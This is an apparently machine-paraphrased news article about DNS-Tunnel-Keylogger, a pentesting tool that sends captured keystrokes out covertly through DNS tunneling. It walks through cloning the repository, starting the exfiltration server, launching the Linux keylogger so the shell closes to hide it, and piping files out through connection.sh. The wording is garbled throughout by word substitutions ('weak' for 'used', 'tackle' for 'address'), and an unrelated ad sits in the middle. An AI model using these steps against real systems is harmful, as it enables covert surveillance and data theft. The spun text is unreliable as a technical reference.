DNS Tunnel Keylogger – An Offensive Post-Exploitation Tool For Pentesters
DNS Tunnel Keylogger – An Offensive Post-Exploitation Tool For Pentesters
A peculiar keylogging server and consumer instrument had been launched on GitHub for pentesters. The instrument utilizes DNS tunneling to transmit keystrokes via firewalls, potentially evading detection covertly.
The instrument, DNS-Tunnel-Keylogger, became designed for post-exploitation activities for pentesters and emphasizes gentle-weight exfiltration and persistence to diminish the potentialities of being chanced on by security systems.
The server ingredient of the instrument is written in Python 3 and requires the set up of dependencies via pip.
It operates by default on UDP port fifty three, nevertheless users can specify a determined port the use of the -p flag. The server’s IP tackle is weak in SOA and NS records to enable other nameservers to detect the server.
Customers are suggested to living their domain’s namespace to personalized DNS and level it to the exfiltration server’s IP tackle, effectively setting glue records.
DNS tunneling is a technique for encoding the records of alternative applications or protocols in DNS queries and responses.
It can well well presumably be particularly helpful for post-exploitation records extraction while fending off detection and firewall restrictions.
- Recordsdata of DNS and networking ideas
- Familiarity with Python and Bash scripting
- A Linux atmosphere for the keylogger consumer
- Python3 installed on the server
On the consumer aspect, the Linux keylogger includes two bash scripts. The connection.sh
script is accountable for sending the captured keystrokes to the server, while the logger.sh
script is weak to open the keylogging course of.
The keylogger also can very wisely be started silently, and the shell also can very wisely be closed upon exit to steer obvious of returning to a non-keylogger assert.
AI-Powered Safety for Business E-mail Safety
Trustifi’s Evolved threat security prevents the widest spectrum of refined assaults sooner than they reach a userâs mailbox. Strive Trustifi Free Threat Scan with Sophisticated AI-Powered E-mail Safety .
The developers show that the keylogger is no longer going to bustle in non-interactive shells and that the Windows Dns_Query_A
characteristic tends to send replica requests, though the server is designed to handle this by discarding repeated packets[[
DNS Tunnel Keylogger – Server Setup
Step 1: Clone the Repository
First, you might well clone the DNS-Tunnel-Keylogger repository from GitHub:
git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git
Step 2: Install Dependencies
Navigate to the cloned directory and install the main Python dependencies:
cd DNS-Tunnel-Keylogger python3 -m pip install -r requirements.txt
Step 3: Delivery the Server
To open the server, use the next inform:
python3 main.py
Replace
with the IP tackle of the server and
with the domain that the server is authoritative for.
Server Alternate ideas:
-h, --help
: Cowl the support message and exit.-p PORT, --port PORT
: Specify a determined port to hear on. By default, the server listens on UDP port fifty three.
Client Setup (Linux Keylogger)
Step 1: Put collectively the Scripts
Hold sure that that logger.sh
and connection.sh
are in the the same directory. These scripts will hold and send the keystrokes to the server.
Step 2: Delivery the Keylogger
To open the keylogger, obtain the next inform:
./logger.sh && exit
Replace
with the domain to send records to. The && exit
will shut the shell upon exit to prevent returning to a non-keylogged shell.
Keylogger Alternate ideas:
-p path
: Specify the path to the log file to hear to. By default, that is/tmp/
.-l
: Bustle the logger with warnings and errors printed, which is able to be helpful for debugging.
Further Recordsdata
Handbook Recordsdata Transmission
Within the event you should send records, equivalent to a file, manually, you also can pipe the records to the connection.sh
script, that can establish a connection and send the records.
Safety Issues
If weak without smartly matched authorization, a keylogger and DNS tunneling also can very wisely be notion of malicious and unlawful in many jurisdictions. Hold sure that you just also can use these tools for your atmosphere and follow all linked prison ideas and ethical ideas.
Troubleshooting
- Within the event you come upon points, remove the
&> /dev/null
from the keylogger inform to existing error messages. - Check the server’s firewall settings to catch sure the DNS port (default fifty three) is delivery for incoming and outgoing connections.
- Please take a look at that the domain weak is precisely configured and that the server is determined as authoritative for it.
This files offers the steps to living up a DNS tunneling keylogger for covert keystroke exfiltration. Ensure to use this instrument responsibly and internal the regulation.
Source credit : cybersecuritynews.com